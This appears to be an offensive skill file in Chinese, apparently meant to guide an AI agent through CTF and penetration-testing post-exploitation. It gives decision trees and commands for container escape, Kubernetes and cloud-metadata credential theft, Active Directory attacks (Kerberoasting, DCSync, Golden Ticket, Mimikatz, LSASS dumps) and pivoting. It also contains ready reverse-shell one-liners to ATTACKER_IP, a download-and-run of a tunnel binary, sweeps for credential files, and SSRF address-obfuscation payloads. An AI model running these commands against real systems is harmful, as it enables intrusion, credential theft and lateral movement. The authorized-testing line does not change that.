// Use when conducting penetration testing, post-exploitation, lateral movement, domain attacks, cloud exploitation (AWS/GCP/Azure), container escape, or Kubernetes cluster attacks
Use when facing AI security challenges involving prompt injection, LLM jailbreaks, or AI agent exploitation
Use when facing binary exploitation (PWN) or reverse engineering challenges involving memory corruption, ROP chains, shellcode, binary analysis, decompilation, unpacking, or dynamic tracing
Use when facing cryptography challenges involving cipher analysis, key recovery, mathematical attacks, or protocol weaknesses
Use when transferring files between remote environments and local Docker containers via litterbox.catbox.moe relay or base64 chunked fallback
Use when facing digital forensics or misc challenges involving disk images, memory dumps, network captures, steganography, file format analysis, encoding puzzles, sandbox escapes, or archive manipulation
Use when stuck, looping on same approach, making no progress after multiple tool calls, or receiving a stagnation warning from the system. Also trigger when you catch yourself retrying the same command with minor variations, getting repeated Permission denied or timeout errors, or unable to advance past a specific step for 10+ tool calls.
| name | infra-exploit |
| description | Use when conducting penetration testing, post-exploitation, lateral movement, domain attacks, cloud exploitation (AWS/GCP/Azure), container escape, or Kubernetes cluster attacks |
后渗透专项:容器逃逸、Kubernetes 集群攻击、云环境利用、域渗透、横向移动。
基础渗透(recon/scanning/initial access/web vulns)由
web-securityskill 覆盖,本 skill 聚焦于获取 shell 之后的攻击链。 所有测试必须在授权范围内进行。
获取 shell 后立即判断所在环境,路由到对应攻击决策树:
获取 Shell
│
├── 仅有 Webshell/SSRF,未获得交互式 Shell? → §7 Pivot & Tunneling
│ 先升级: webshell → reverse shell → 稳定隧道,再进入后续流程
│
├── 发现内网网段(172.x/192.168.x/10.x 非目标 IP)? → §7 Pivot & Tunneling
│ 检测: ip a; cat /etc/hosts; cat /proc/net/fib_trie
│
├── 在 Docker 容器内? → §2 容器逃逸决策树
│ 检测: cat /proc/1/cgroup | grep docker; ls /.dockerenv
│
├── 在 K8s Pod 内? → §3 Kubernetes 攻击决策树
│ 检测: ls /var/run/secrets/kubernetes.io/serviceaccount/; env | grep KUBERNETES
│
├── 云环境? → §4 云环境利用
│ 检测: curl -s -m 2 http://169.254.169.254/; env | grep -iE '(AWS|AZURE|GOOGLE|CLOUD)'
│
├── Windows 域环境? → §6 域攻击速查
│ 检测: net config workstation; nltest /dclist:*
│
└── 标准 Linux/Windows → §5 凭据收割 → modules/lateral-movement.md
首要动作(任何环境都先执行):
# 凭据速查
env | grep -iE "(key|token|pass|secret|api|cred|aws|azure|google)"
cat ~/.aws/credentials ~/.config/gcloud/credentials.db 2>/dev/null
# 网络态势
ip a 2>/dev/null || ifconfig; cat /etc/hosts
# 1. 确认在容器内
cat /proc/1/cgroup 2>/dev/null | grep -qi docker && echo "Docker"
ls -la /.dockerenv 2>/dev/null && echo "Docker"
# 2. 权限 & capability
cat /proc/self/status | grep CapEff
# 0000003fffffffff = privileged
id
cat /proc/1/status | grep Seccomp # 0=disabled
# 3. 挂载 & 设备
ls -la /var/run/docker.sock 2>/dev/null # Docker Socket
ls /dev/sda* /dev/vda* 2>/dev/null # 块设备
mount | grep -E '(docker|overlay|proc)'
find / -name core_pattern 2>/dev/null # procfs 挂载?
# 4. 网络
ip a 2>/dev/null || ifconfig
cat /etc/hosts
IP=$(hostname -i | awk -F. '{print $1"."$2"."$3".1"}')
timeout 2 bash -c "echo >/dev/tcp/$IP/2375" 2>/dev/null && echo "Docker Remote API open"
# 5. 内核
uname -r # 判断内核 CVE
[START] 容器侦察完成
|
+-- Docker Socket? (/var/run/docker.sock)
| +-> curl --unix-socket 创建挂载宿主机的特权容器 [最简单]
|
+-- Docker Remote API? (宿主机:2375 可达)
| +-> docker -H tcp://HOST:2375 run -v /:/host ... [等效 Socket]
|
+-- Privileged? (CapEff=0000003fffffffff)
| +-> nsenter -t 1 -m -u -i -n -p -- /bin/sh [最直接]
| +-> 备选: mount /dev/sda1 /mnt
|
+-- 有块设备? (/dev/sda*)
| +-> mount /dev/sda1 /mnt/host
|
+-- SYS_ADMIN?
| +-- cgroup 可写? -> release_agent 逃逸
| +-- 可 mount? -> mount 宿主机 FS
|
+-- 宿主机 procfs 挂载? (find / -name core_pattern 有2个)
| +-> core_pattern 写入逃逸(|/path/to/script)
|
+-- Docker 用户组? (非 root 但在 docker group)
| +-> docker run -v /:/host ... 等效 root
|
+-- NET_RAW + 同网段服务?
| +-- 发现已建立的明文连接 (netstat/ss)?
| | +-> 嗅探 seq/ack + 直接注入应用层命令(不需要密码)
| | +-> 或: 先嗅探,再触发新连接捕获认证凭据
| +-- 未发现现有连接?
| +-> ARP 欺骗 + 嗅探同网段其他容器间流量
| +-- 获取数据库凭据/RCE 后:
| +-> 检查目标容器是否 privileged → mount 宿主机磁盘
| +-> 或: 数据库命令执行 (PG COPY FROM PROGRAM / Redis CONFIG SET)
|
+-- SYS_PTRACE + 共享 PID NS?
| +-> nsenter 或 /proc/PID/root 访问宿主机
|
+-- DAC_READ_SEARCH?
| +-> shocker exploit (open_by_handle_at)
|
+-- 内核 CVE?
| +-> DirtyCow(2.6.22-4.8.3) / DirtyPipe(5.8-5.16.11) / CVE-2020-14386(4.6-5.9)
| +-> runc CVE-2019-5736 / CVE-2024-21626 / CVE-2022-0492
|
+-- 以上都没有?
+-> 环境变量凭据、挂载的敏感文件、可写宿主机路径
| Capability | 攻击面 | 利用 |
|---|---|---|
ALL (privileged) | 完全逃逸 | nsenter / mount /dev/sda1 |
SYS_ADMIN | cgroup/mount | release_agent / mount FS |
NET_RAW | 嗅探/欺骗 | scapy ARP + 协议嗅探 |
SYS_PTRACE | 进程注入 | /proc/PID/mem (共享 PID NS) |
DAC_READ_SEARCH | 绕过权限 | open_by_handle_at |
NET_ADMIN | 流量劫持 | iptables REDIRECT |
SYS_MODULE | 内核模块 | insmod LKM |
MKNOD | 设备节点 | 创建块设备 |
Capability 解码: capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')
| CVE | 内核/组件版本 | 类型 |
|---|---|---|
| CVE-2016-5195 | kernel 2.6.22-4.8.3 | DirtyCow: 竞态写只读内存 |
| CVE-2020-14386 | kernel 4.6-5.9 | AF_PACKET 内存越界 |
| CVE-2021-22555 | kernel < 5.12 | Netfilter OOB write |
| CVE-2022-0847 | kernel 5.8-5.16.11 | DirtyPipe: splice 覆盖只读文件 |
| CVE-2022-0185 | kernel < 5.16.2 | FS context 堆溢出 |
| CVE-2022-0492 | cgroup v1 | cgroup release_agent 逃逸 |
| CVE-2019-5736 | runc < 1.0-rc6 | 覆盖宿主机 runc |
| CVE-2024-21626 | runc < 1.1.12 | fd 泄露逃逸 |
| CVE-2020-15257 | containerd < 1.3.9 | shim API 未授权 |
详细脚本模板: 参考 modules/container-escape.md
# 1. 确认 K8s 环境
ls /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null
env | grep KUBERNETES
cat /etc/resolv.conf | grep svc.cluster.local
# 2. SA Token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
APISERVER=https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}
# 3. 权限枚举
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
-X POST -H "Content-Type: application/json" \
-d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectRulesReview","spec":{"namespace":"'$NS'"}}'
# 4. 快速检查关键权限
curl -sk -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces/$NS/secrets | head -5
curl -sk -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/pods | head -5
# 5. 网络服务发现 (DNS)
for svc in kubernetes-dashboard grafana prometheus redis etcd; do
nslookup $svc.default.svc.cluster.local 2>/dev/null | grep -q "Address" && echo "Found: $svc"
done
# 6. kubelet 探测
for port in 10250 10255; do
curl -sk --connect-timeout 2 https://${KUBERNETES_SERVICE_HOST}:$port/pods 2>/dev/null | head -5
done
[START] 确认在 K8s Pod 内
|
+-- SA Token 权限检查
| +-- cluster-admin? -> 直接控制整个集群
| +-- pods create? -> 创建特权 Pod 逃逸到 Node
| +-- secrets list/get? -> 获取凭证(其他 SA token/DB 密码)
| +-- pods/exec? -> 横向移动到其他 Pod
| +-- serviceaccounts/token create? -> 为高权限 SA 创建 token
| +-- nodes/proxy? -> API Server Proxy 到 kubelet(绕过 kubelet 认证!)
| +-- configmaps get? -> 读取敏感配置
| +-- daemonsets create? -> 在所有节点部署特权容器
|
+-- kubelet API(直连或通过 API Server Proxy / SSRF)
| +-- 10250 未授权? -> /run/NS/POD/CTR 执行命令(POST, 最简单)
| +-- 10250 已授权? -> 需要窃取 token 或走 API Server Proxy
| +-- 10255 开放? -> 收集 Pod 信息/环境变量
| +-- kubelet exec 注意: /exec 需要 WebSocket, /run 用普通 POST
|
+-- API Server Node Proxy(拥有 nodes/proxy 权限时)
| +-- /api/v1/nodes/{node}/proxy/pods -> 列出 pods
| +-- /api/v1/nodes/{node}/proxy/run/{ns}/{pod}/{ctr} -> POST 执行命令
| +-- /api/v1/nodes/{node}/proxy/runningpods -> 运行中 pods
| +-- 关键: kubelet 信任来自 API Server 的请求,不再验证原始用户权限
|
+-- SSRF 到 kubelet/API Server(通过内部漏洞服务)
| +-- 内部服务用 fmt.Sprintf 拼接 URL? -> 路径注入
| +-- container=../../../../runningpods -> 路径遍历到任意 kubelet 端点
| +-- Go net/http 会规范化 /../ -> 但结果是执行遍历(不是阻止!)
|
+-- etcd (2379)
| +-- 未授权? -> 读取 /registry/secrets 获取全部凭证
|
+-- Pod 安全配置
| +-- hostPID? -> nsenter -t 1 逃逸
| +-- hostNetwork? -> 访问 localhost 服务 (kubelet/etcd/API)
| +-- hostPath /? -> 读写宿主机文件系统
| +-- privileged? -> 容器逃逸决策树
|
+-- EKS/GKE 特有
| +-- IMDS 可达? -> aws eks get-token 提升 kubectl 权限
| +-- OIDC 信任关系? -> assume-role-with-web-identity 获取 AWS 权限
| +-- imagePullSecret? -> 拉取私有镜像审计 history
|
+-- 服务网格 (Istio/Kyverno)
| +-- Istio: uid 1337 (istio用户) 可绕过 iptables 规则
| +-- Kyverno: 直接 POST AdmissionReview 到 /mutate 触发 env 注入
|
+-- 横向移动
+-- Taint/Toleration: 创建 tolerations Pod 调度到 master 节点
+-- /var/log 挂载 + 符号链接: ln -s / /var/log/host/root_link
然后 curl kubelet /logs/root_link/ 读取 Node 文件
kubelet /run 端点接受普通 POST,是最实用的远程命令执行方式:
# 直连 kubelet(未授权或有 token)
curl -sk https://NODE:10250/run/NS/POD/CTR -X POST -d "cmd=id"
# 通过 API Server Proxy(需要 nodes/proxy 权限)
curl -sk -H "Authorization: Bearer $TOKEN" \
"$APISERVER/api/v1/nodes/NODE_NAME/proxy/run/NS/POD/CTR" -X POST -d "cmd=id"
当发现内部服务有 SSRF 且 URL 使用 fmt.Sprintf 拼接时:
# 路径注入:container 参数注入 ../../../../ 遍历到任意 kubelet 端点
container=../../../../runningpods # 列出所有 pods
container=../../../../pods # 完整 pod 信息(含 SA token 路径)
container=../../../../run/NS/POD/CTR # 执行命令(如果 SSRF 是 POST)
| 权限 | 利用 |
|---|---|
pods create | 创建特权 Pod 挂载宿主机 |
pods/exec | exec 进入其他 Pod |
secrets list/get | 获取 SA token / 数据库密码 |
serviceaccounts/token create | 为高权限 SA 创建 token |
nodes/proxy | 访问 kubelet API |
clusterroles bind | 绑定 cluster-admin |
daemonsets create | 所有节点部署容器 |
| K8s 版本 | Token 行为 |
|---|---|
| <= 1.20 | 创建 SA 自动创建永久 Secret + 投射卷挂载 |
| 1.21-1.23 | 自动创建 Secret,但 Pod 用 kubelet TokenRequest API 申请(1年有效,每小时刷新) |
| >= 1.24 | 不再自动创建 Secret,只用 TokenRequest API |
详细 curl 命令和 Pod YAML 模板: 参考 modules/kubernetes.md
# 1. 直接探测元数据端点
curl -s -m 2 http://169.254.169.254/latest/meta-data/ # AWS
curl -s -m 2 -H "Metadata-Flavor: Google" http://metadata.google.internal/ # GCP
curl -s -m 2 -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" # Azure
curl -s -m 2 http://100.100.100.200/latest/meta-data/ # Alibaba
# 2. ECS/Fargate 容器凭证
echo $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
curl -s http://170.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
# 3. 检查现有凭证
env | grep -i -E '(AWS|AZURE|GOOGLE|CLOUD|KEY|SECRET|TOKEN)'
cat ~/.aws/credentials 2>/dev/null
cat ~/.config/gcloud/credentials.db 2>/dev/null
| Cloud | IP/Host | Header | Credential Path |
|---|---|---|---|
| AWS v1 | 169.254.169.254 | none | /latest/meta-data/iam/security-credentials/<ROLE> |
| AWS v2 | 169.254.169.254 | PUT for token | same (with token header) |
| GCP | metadata.google.internal | Metadata-Flavor: Google | /computeMetadata/v1/instance/service-accounts/default/token |
| Azure | 169.254.169.254 | Metadata: true | /metadata/identity/oauth2/token?resource=https://management.azure.com/ |
| Alibaba | 100.100.100.200 | none | /latest/meta-data/ram/security-credentials/<ROLE> |
| ECS/Fargate | 170.254.170.2 | none | $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI |
[START] 云环境发现
|
+-- IMDS 直接可达?
| +-- AWS
| | +-- IMDSv1 可用? -> 直接 GET IAM 凭证
| | +-- 仅 IMDSv2? -> PUT 获取 token 后再请求
| | +-- 获取 AKSK+SessionToken -> AWS 后续利用
| |
| +-- GCP
| | +-> 带 Metadata-Flavor header -> 获取 access_token
| | +-> 旧版 v1beta1 可能不需要 header
| | +-> GCP 后续利用
| |
| +-- Azure
| +-> 带 Metadata: true header -> 获取 Managed Identity token
| +-> 不同 resource 参数获取不同服务 token
| +-> Azure 后续利用
|
+-- 通过 SSRF 间接访问?
| +-- 简单 GET SSRF -> 仅 IMDSv1 和无 header 的端点
| +-- 可控 Header -> 绕过 GCP/Azure header 检查
| +-- 可控 Method (PUT) -> 绕过 IMDSv2
| +-- 302 重定向 -> 仅 IMDSv1 (v2 不跟随重定向)
| +-- CRLF 注入 -> URL 中注入 header
| +-- DNS 重绑定 -> 绕过 DNS 检查
| +-- IP 变形: 十进制/十六进制/八进制/IPv6映射
|
+-- 获取凭证后
+-- AWS: sts get-caller-identity → S3/Secrets/SSM/Lambda/IAM 枚举
+-- GCP: gcloud storage ls / secrets list / compute instances list
+-- Azure: Key Vault / Blob Storage / Runbooks / VM RunCommand
# 1. 身份确认
aws sts get-caller-identity
# 2. 高价值目标
aws secretsmanager list-secrets
aws ssm describe-parameters
aws s3 ls
# 3. IAM 枚举
aws iam list-roles --query 'Roles[].Arn'
aws iam list-attached-role-policies --role-name ROLE
# 4. assume-role 暴力枚举
aws iam list-roles --query 'Roles[].Arn' | jq -r '.[]' > roles.txt
while read r; do aws sts assume-role --role-arn $r --role-session-name test 2>&1; done < roles.txt
# 5. Pacu 自动化
import_keys <profile>
run iam__detect_honeytokens
run iam__enum_permissions
run iam__privesc_scan
# 169.254.169.254 各种表示
http://2852039166 # decimal
http://0xa9fea9fe # hex
http://0251.0376.0251.0376 # octal
http://[::ffff:a9fe:a9fe] # IPv6 mapped
http://169.254.169.254.nip.io # DNS service
详细 curl 命令和利用链: 参考 modules/cloud-metadata.md
任何环境获取 shell 后优先执行,为横向移动和提权提供弹药:
# === 环境变量 & 配置文件 ===
env | grep -iE "(key|token|pass|secret|api|cred|aws|azure|google|db|mysql|pg|redis)"
find / -maxdepth 4 -name "*.env" -o -name "*.conf" -o -name "*.cfg" -o -name "*.ini" \
-o -name "wp-config.php" -o -name "settings.py" -o -name "application.yml" 2>/dev/null
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -iE "(pass|key|token|secret)"
# === 历史文件 ===
cat ~/.*history 2>/dev/null | grep -iE "(pass|key|token|secret|curl|ssh|mysql|psql)"
# === SSH 密钥 ===
find / -maxdepth 4 -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" 2>/dev/null
cat /etc/ssh/sshd_config 2>/dev/null | grep -i authorized
# === 数据库连接串 ===
grep -rn "mysql\|postgres\|redis\|mongodb\|jdbc:" /var/www /opt /srv /app 2>/dev/null | head -20
# === 云凭证 ===
cat ~/.aws/credentials ~/.config/gcloud/credentials.db 2>/dev/null
ls -la /var/run/secrets/ 2>/dev/null
# === Windows 凭据(如适用)===
# cmdkey /list
# dir /s /b C:\Users\*\AppData\*\*credential* 2>/dev/null
# reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr /i "password"
详细后渗透清单: 参考 modules/post-compromise.md
# 域信息 + BloodHound 数据收集
net config workstation && nltest /dclist:*
net group "Domain Admins" /domain
SharpHound.exe -c All # 或 bloodhound-python -d domain.com -u user -p pass -ns dc_ip
Kerberoasting:
GetUserSPNs.py domain/user:pass -dc-ip dc -request
hashcat -m 13100 hash.txt wordlist.txt
AS-REP Roasting:
GetNPUsers.py domain/ -usersfile users.txt -dc-ip dc
hashcat -m 18200 hash.txt wordlist.txt
DCSync:
secretsdump.py domain/admin:pass@dc
# 或 Mimikatz: lsadump::dcsync /domain:domain.com /user:Administrator
ZeroLogon (CVE-2020-1472):
zerologon_tester.py dc_name dc_ip
Golden Ticket:
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ptt
Silver Ticket:
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /target:dc.domain.com /service:cifs /rc4:hash /ptt
ACL Abuse:
GenericAll / WriteDacl / WriteOwner → 通过 BloodHound 路径分析
委派攻击: 非约束 / 约束 / RBCD
# Mimikatz
privilege::debug
sekurlsa::logonpasswords # 内存密码
lsadump::sam # SAM 数据库
# LSASS 转储
procdump -ma lsass.exe lsass.dmp
pypykatz lsa minidump lsass.dmp
# PTH / PTT
sekurlsa::pth /user:admin /domain:domain.com /ntlm:hash /run:cmd
cme smb target -u admin -H ntlm_hash
kerberos::ptt ticket.kirbi
# Golden Ticket (需要 krbtgt hash) / Silver Ticket (需要服务账户 hash)
# Skeleton Key: misc::skeleton
# AdminSDHolder / DCShadow / SID History
详细流程: 参考 modules/domain.md modules/lateral-movement.md
关键: 从 web-security 的 webshell/RCE/SSRF 过渡到内网渗透。Webshell 是起点不是终点。
当前能力
├── 交互式 Shell → 直接建隧道(chisel/frp/SSH)→ proxychains 内网渗透
├── 仅 Webshell → 先升级为 reverse shell,再建隧道
│ ├── 能执行系统命令 → 反弹 Shell(见下方 payload)
│ └── disable_functions → LD_PRELOAD/FFI/proc_open 绕过
├── 仅 SSRF → 先升级为 RCE(gopher→Redis/FastCGI),再走上方路径
└── 仅 LFI → 先升级为 RCE(log poisoning/PHP session injection/filter chain),再走上方路径
# 检测可用工具
which bash nc python3 perl php curl 2>/dev/null
# Python(最推荐)
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Bash
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'
# PHP
php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
# Netcat(无 -e 版)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
# Shell 稳定化
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z → stty raw -echo; fg → export TERM=xterm
# 监听端(攻击机/Docker)
nc -lvnp PORT
# 或 Task[c2] 启动 MSF multi/handler(推荐,可升级 meterpreter)
# === 场景 A: 目标有出站 HTTP → chisel reverse SOCKS(最推荐)===
# 攻击机:
chisel server -p 8888 --reverse --socks5
# 目标机(下载并执行):
curl http://ATTACKER:PORT/chisel -o /tmp/c && chmod +x /tmp/c
/tmp/c client ATTACKER:8888 R:1080:socks
# 攻击机 1080 即为 SOCKS5,通过它访问内网:
proxychains4 nmap -sT -Pn 172.18.0.0/24
proxychains4 curl http://172.18.0.3:8080/
# === 场景 B: 出站 TCP → SSH 动态转发 ===
ssh -f -N -D 1080 user@boundary
# === 场景 C: 仅 webshell 无出站 → Neo-reGeorg HTTP 隧道 ===
# 攻击机生成 tunnel 脚本,上传到 webshell 目录
python3 neoreg.py generate -k password123
# 上传 tunnel.php 后:
python3 neoreg.py -k password123 -u http://TARGET/tunnel.php -p 1080
SSRF
├── 支持 gopher:// → Redis(6379): 写 webshell/SSH key/cron → RCE
│ → FastCGI(9000): 直接 PHP 命令执行
│ → MySQL(3306 无密码): UDF RCE
├── 仅 http:// → Docker API(2375): 创建特权容器 → 宿主机
│ → 云元数据(169.254.169.254): IAM 凭据
│ → 内网 Web 应用: 已知 CVE / 认证绕过
└── 支持 file:// → 读源码找凭据 → 用凭据登录其他服务
| 端口 | 服务 | 利用 |
|---|---|---|
| 6379 | Redis | 未授权 → webshell/SSH key/cron |
| 3306 | MySQL | UDF/INTO OUTFILE webshell |
| 5432 | PostgreSQL | COPY FROM PROGRAM 命令执行 |
| 2375 | Docker API | 特权容器挂载宿主机 |
| 9000 | FastCGI | 直接 PHP RCE |
| 22 | SSH | 凭据重用、私钥登录 |
| 80/8080 | Web | 认证绕过、已知 CVE |
| 27017 | MongoDB | 未授权数据提取 |
更多详细操作(disable_functions 绕过、gopher payload 生成、Redis/MySQL/Docker 利用脚本、多跳 pivot): 参考 modules/pivot-tunneling.md
| 工具 | 用途 |
|---|---|
| CDK | 容器逃逸自动检测 ./cdk evaluate |
| scapy | ARP/TCP/DNS 网络攻击 |
| kubectl | K8s CLI |
| etcdctl | etcd 读取 |
| kubeletctl | kubelet 利用 |
| peirates | K8s 渗透测试 |
| dnscan | K8s 子网 DNS 服务发现 |
| kube-review | 生成 AdmissionReview 请求 |
| crane | 远程容器镜像审计 |
| 工具 | 用途 |
|---|---|
| aws-cli | AWS CLI |
| gcloud | GCP CLI |
| az | Azure CLI |
| pacu | AWS 渗透测试框架 |
| ScoutSuite | 多云审计 |
| CloudFox | 云攻击面枚举 |
| enumerate-iam | AWS IAM 枚举 |
| Prowler | AWS 安全检查 |
| 工具 | 用途 |
|---|---|
| impacket | Windows 协议利用 (psexec/wmiexec/secretsdump) |
| crackmapexec | 多协议渗透 |
| evil-winrm | WinRM 交互 |
| chisel | 端口转发/隧道 |
| proxychains4 | 代理链 |
| lazagne | 全面凭据搜集 |
| fscan | 内网扫描 |
词表: /usr/share/seclists/
| Module | 内容 |
|---|---|
modules/pivot-tunneling.md | Webshell→反弹Shell→隧道→内网渗透 完整操作手册 |
modules/container-escape.md | 容器逃逸脚本模板与 PoC |
modules/kubernetes.md | K8s 攻击 curl 命令与 Pod YAML 模板 |
modules/cloud-metadata.md | 云元数据利用与 SSRF 绕过脚本 |
modules/domain.md | 域渗透技术 |
modules/lateral-movement.md | 横向移动详解 |
modules/post-compromise.md | 后渗透信息收集清单 |
modules/recon.md | 信息收集详解 (基础侦察由 web-security skill 覆盖) |